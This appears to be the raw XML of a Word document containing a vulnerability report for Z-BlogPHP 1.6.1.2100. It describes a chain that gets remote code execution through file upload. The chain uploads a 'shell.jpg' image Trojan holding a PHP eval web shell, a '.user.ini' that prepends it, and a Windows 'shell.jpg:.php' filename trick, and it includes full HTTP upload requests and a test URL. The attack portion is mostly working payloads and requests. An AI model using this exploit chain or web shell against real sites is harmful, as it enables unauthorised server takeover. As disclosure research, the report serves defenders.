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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#Vulnerability title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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blogphp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 xml:space="preserve"> 1.6.1.2100 (Valyria)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has a file upload vulnerability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宋体" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"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 xml:space="preserve">Vulnerability Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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File upload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>Vulnerability Version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7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.6.1.2100 (Valyria)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>Recurring environment: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caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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 xml:space="preserve">Windows 10*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 xml:space="preserve">PHP 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>7.3.4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Apache 2.4.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>39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  <w:t>Vulnerability Description AND recurrence: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Download and install here, the installation process will not be detailed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https://github.com/zblogcn/zblogphp/releases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Throughout the code audit process, I found that it did not allow me to upload PHP files in any case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b/>
          <w:bCs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/>
          <w:bCs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zb_system\function\lib\upload.php  line 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b/>
          <w:bCs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284670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When I was browsing the website functions, I found that I could control the "suffix allowed to upload the website"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our_url/zb_system/admin/index.php?act=SettingMng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2245" cy="255460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Here, I can add suffixes such as PHP3 by case, but the server does not resolve it by default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506980" cy="7086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Then I added the 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ini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suffix and the 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htaccess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suffix, because of the local environment, I did not use the B suffix successfully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But it should work on other people's servers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So I'm going to try to use ini.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Let's upload a picture Trojan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The first step is to open the website and log in to the background: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our_url/zb_system/login.php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60731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Then we click these places to upload the image Trojan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our_url/zb_system/admin/index.php?act=UploadMng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63283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Be sure to cancel "auto rename file name"!!!!!!!!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 intercept the data packet and put it into the burp for operation. In this step, we should have uploaded a picture Trojan horse, as shown in the figure below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3317875"/>
            <wp:effectExtent l="0" t="0" r="635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POST /zb_system/cmd.php?act=UploadPst&amp;csrfToken=3a51697a8931b28a86c1e88082770d97 HTTP/1.1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Host: www.dmsj.com:8081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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: multipart/form-data; boundary=---------------------------161333266511897080802046595295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Content-Length: 267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Origin: http://www.dmsj.com:8081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Connection: close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Referer: http://www.dmsj.com:8081/zb_system/admin/index.php?act=UploadMng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Cookie: timezone=8; username=admin; token=168bf36600ec1757b4336266785018b0868d234361841de5fb11d14827f940131605681847; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D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Upgrade-Insecure-Requests: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-----------------------------161333266511897080802046595295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Content-Disposition: form-data; name="file"; filename="shell.jpg"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Content-Type: application/octet-stream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&lt;?php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@eval($_GET['dawn']);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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="AFAFAF"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-----------------------------161333266511897080802046595295--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Let's take a look under directory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“\zb_users\upload\2020\11”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 this directory is named after the date of the day. We can see the picture Trojan just uploaded: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1615440"/>
            <wp:effectExtent l="0" t="0" r="146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Then we upload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.user.ini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file, which is as follows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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1395730"/>
            <wp:effectExtent l="0" t="0" r="63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  <w:t>-----------------------------161333266511897080802046595295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  <w:t>Content-Disposition: form-data; name="file"; filename=".user.ini"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  <w:t>Content-Type: application/octet-stream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  <w:t>auto_prepend_file=shell.jpg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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-----------------------------161333266511897080802046595295--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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="1610995"/>
            <wp:effectExtent l="0" t="0" r="13970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But we know that to take advantage of a, we need to have a normal PHP file in the current directory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!!!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Here I think of the features of windows, where we can bypass the limitations of the system and upload an empty PHP file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!!!!!!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911860"/>
            <wp:effectExtent l="0" t="0" r="635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  <w:t>-----------------------------161333266511897080802046595295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  <w:t>Content-Disposition: form-data; name="file"; filename="shell.jpg:.php"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  <w:t>Content-Type: application/octet-stream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  <w:t>Anything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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-----------------------------161333266511897080802046595295--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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1691640"/>
            <wp:effectExtent l="0" t="0" r="190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Good. All three files were successfully passed to the server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We're going to visit it now!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our_url/zb_users/upload/your_catalogue/shell.php?dawn=phpinfo();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738630"/>
            <wp:effectExtent l="0" t="0" r="3810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pleasantly surprised! This is a very interesting combination of loopholes!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46B7A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FE346B7A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="26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551E"/>
    <w:rsid w:val="01982F31"/>
    <w:rsid w:val="02285D81"/>
    <w:rsid w:val="04AB0F0B"/>
    <w:rsid w:val="05000A3B"/>
    <w:rsid w:val="0641549C"/>
    <w:rsid w:val="065D0A0A"/>
    <w:rsid w:val="06E37376"/>
    <w:rsid w:val="07417952"/>
    <w:rsid w:val="083046FE"/>
    <w:rsid w:val="096E6B39"/>
    <w:rsid w:val="09BE6424"/>
    <w:rsid w:val="0BD34169"/>
    <w:rsid w:val="0E100C80"/>
    <w:rsid w:val="0E387C86"/>
    <w:rsid w:val="0FAA6D7F"/>
    <w:rsid w:val="15036002"/>
    <w:rsid w:val="161468FD"/>
    <w:rsid w:val="185E4083"/>
    <w:rsid w:val="199F6969"/>
    <w:rsid w:val="19FB0DB7"/>
    <w:rsid w:val="1AA425C7"/>
    <w:rsid w:val="1B3D78B8"/>
    <w:rsid w:val="1D102972"/>
    <w:rsid w:val="1D2241C2"/>
    <w:rsid w:val="1F8E7C94"/>
    <w:rsid w:val="257B4A7B"/>
    <w:rsid w:val="26D552F4"/>
    <w:rsid w:val="290A3248"/>
    <w:rsid w:val="29C2446B"/>
    <w:rsid w:val="2AFB1FDE"/>
    <w:rsid w:val="2B244453"/>
    <w:rsid w:val="2CD5602F"/>
    <w:rsid w:val="300E6F16"/>
    <w:rsid w:val="32152478"/>
    <w:rsid w:val="338D743F"/>
    <w:rsid w:val="33D6315B"/>
    <w:rsid w:val="33F0547D"/>
    <w:rsid w:val="34A54B43"/>
    <w:rsid w:val="350C57FD"/>
    <w:rsid w:val="35BC32BD"/>
    <w:rsid w:val="37AA35BA"/>
    <w:rsid w:val="38D710BC"/>
    <w:rsid w:val="3A0832A6"/>
    <w:rsid w:val="3A5F64F6"/>
    <w:rsid w:val="3AB54BE9"/>
    <w:rsid w:val="3C6C34BC"/>
    <w:rsid w:val="3EDB3AA1"/>
    <w:rsid w:val="45B71293"/>
    <w:rsid w:val="45CB722F"/>
    <w:rsid w:val="47286BA3"/>
    <w:rsid w:val="472D10E7"/>
    <w:rsid w:val="4B26374C"/>
    <w:rsid w:val="4BF66BEC"/>
    <w:rsid w:val="4DD710F4"/>
    <w:rsid w:val="4EAD01EE"/>
    <w:rsid w:val="4F412894"/>
    <w:rsid w:val="51D84496"/>
    <w:rsid w:val="52125AAC"/>
    <w:rsid w:val="599230C1"/>
    <w:rsid w:val="5CEB3A3C"/>
    <w:rsid w:val="5D3D6161"/>
    <w:rsid w:val="5E9831AB"/>
    <w:rsid w:val="637B238A"/>
    <w:rsid w:val="65A6607E"/>
    <w:rsid w:val="65E43095"/>
    <w:rsid w:val="67FC030F"/>
    <w:rsid w:val="69112ED8"/>
    <w:rsid w:val="6AC51470"/>
    <w:rsid w:val="6D2D003F"/>
    <w:rsid w:val="6EE67995"/>
    <w:rsid w:val="6F0119F3"/>
    <w:rsid w:val="7062246F"/>
    <w:rsid w:val="710669B6"/>
    <w:rsid w:val="71622723"/>
    <w:rsid w:val="75C80EA5"/>
    <w:rsid w:val="763B535B"/>
    <w:rsid w:val="77A8327E"/>
    <w:rsid w:val="7A360F0C"/>
    <w:rsid w:val="7A3D3232"/>
    <w:rsid w:val="7AD532D0"/>
    <w:rsid w:val="7C777174"/>
    <w:rsid w:val="7F215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听她说</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-17T08:41:01Z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